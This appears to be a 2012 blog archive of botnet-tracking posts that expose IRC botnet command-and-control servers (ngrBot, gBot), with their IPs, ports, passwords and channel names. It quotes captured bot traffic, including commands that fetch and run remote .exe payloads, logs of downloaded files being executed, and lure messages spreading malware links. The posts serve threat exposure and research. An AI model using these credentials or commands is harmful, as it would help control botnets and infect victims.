74.63.232.209(ngrBot hosted in United States New York Limestone Networks Inc)

By Pig, January 25, 2012
Uncategorized

Remote Host Port Number 199.15.234.7 80 203.249.66.5 80 74.63.232.209 5236 PASS ROCKR PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |” PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD” PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – RedirectedRead more...

ch1mb4.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)

By Pig, January 25, 2012
Uncategorized

Resolved : [ch1mb4.info] To [74.62.155.207] C&C Server: 74.62.155.207:6060 Server Password: Username: uamethp Nickname: n{DE|XPa}uamethp Channel: #hell (Password: secret) Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt hosting infos: http://whois.domaintools.com/74.62.155.207

64.186.134.161(ngrBot 1.0.3 hosted in United States Atlanta Vpsland.com Llc)

By Pig, January 23, 2012
Uncategorized

Older version of ngrBot with the original manual included Remote Host Port Number 199.15.234.7 80 64.186.134.161 7834 PASS puto NICK n{US|XPa}civmqel USER civmqel 0 0 :civmqel JOIN #dr3 ngrBot Now talking in #dr3 Topic On: [ #dr3 ] [ > Bot attack ! || reporte 23/01/2012 : http://scan4you.net/result.php?id=a3060_16a5mg || manual: http://adgass.edu.gh/ngrbot.txt ] Topic By: [Read more...

lalorlz1.info(ngrBot hosted in Germany Weinstadt Hetzner Online Ag)

By Pig, January 20, 2012
Uncategorized

Resolved : [lalorlz1.info] To [88.198.181.16] Resolved : [lalorlz1.info] To [176.9.192.216] rlz1jmv.info not active C&C Server: 88.198.181.16:5236 PASS ROCKR Server Password: Username: raecpnp Nickname: n{DE|XPa}raecpnp Channel: #ROCK (Password: ngrBot) Channeltopic: :,up http://www.jdkim.com//bbs/data/date/24upjmrlzz.exe 73F91FD360F6E8472B39D8AD58A251F6 | ,j #rockspread | ,s PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira a miley cyrus desnuda y dopada en un hotelRead more...

93.95.99.87(irc botnet hosted in Russian Federation Moscow Jsc Mediasoft Ekspert)

By Pig, January 20, 2012
Uncategorized

Remote Host Port Number 93.95.99.87 1866 NICK n[USA|XP|COMPUTERNAME]pxzflri USER hh “” “lol” :hh Now talking in #!h! Modes On: [ #!h! ] [ +smntu ] .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ hosting infos: http://whois.domaintools.com/93.95.99.87

irc.r00t.me.uk(gBot hosted in Seychelles Ideal Solution Ltd)

By Pig, January 18, 2012
Uncategorized

Remote Host Port Number irc.r00t.me.uk 7007 PASS gBot NICK n{USA|XP}eqqcbip USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip i dont have the exe to find more infos so try to find chanels your self this botnet is from same guy here:http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html hosting infos: http://whois.domaintools.com/193.107.16.113

60.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

By Pig, January 18, 2012
Uncategorized

Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 70.38.98.237 80 60.190.223.42 5101 PASS hax0r PRIVMSG #US! :[d=”http://img102.herosh.com/2012/01/14/551459105.gif” s=”65536 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/14/594572320.gif” s=”61440 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/04/210592960.gif” s=”27648 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.tmp”Read more...